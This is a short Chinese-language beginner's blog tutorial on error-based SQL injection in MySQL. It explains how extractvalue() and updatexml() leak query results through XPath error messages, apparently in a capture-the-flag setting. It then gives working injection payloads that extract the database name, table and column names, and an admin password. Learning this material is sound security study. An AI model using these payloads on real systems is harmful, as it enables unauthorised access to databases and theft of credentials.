SQL初学(4):报错注入

感觉比上一个时间盲注要简单一些。

SQL报错注入就是利用数据库的机制,人为地制造错误条件,使得在显示错误信息同时返回查询结果。这种手段在联合查询受限且能返回错误信息的情况下比较好用。

一,xpath语法错误引发的报错注入:

使用的函数语句:

1,extractvalue

的作用是从 xml 文档中查询指定字符串,具体用法是:

 EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
作用:从目标XML中返回包含所查询值的字符串;
与updatexml()函数相似,该函数对XPath_string进行查询操作,如果符合语法格式要求,则从目标XML中返回包含所查询值的字符串,
不符合语法格式要求,则会报错并带出查询的结果

 ep:

id=1 and extractvalue("anything",concat('~',(user()))) id=1 
and extractvalue("anything",concat(0x7e,(user()))) //0x7e是 ~ 的hex格式。

 

2,updatexml

extractvalue用法相似,多了一个需要赋值的参数

 

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
第三个参数:new_value,String格式,替换查找到的符合条件的数据;
该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格式要求,则会报错并带出查询的结果

二, 构造payload

那么此时payload就和(1)中的差不多啦,按照步骤查询数据库名称,联合查询爆表名,联合查询爆字段,获取flag

id=1 and extractvalue("anything",concat(0x7e,(select database())))#
id=1 and extractvalue("anything",concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema="users")))#
id=1 and extractvalue("anything",concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="userinfo")))#
id=1 and extractvalue("anything",concat(0x7e,(select passwd from userinfo where
uname = 'admin')))#
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值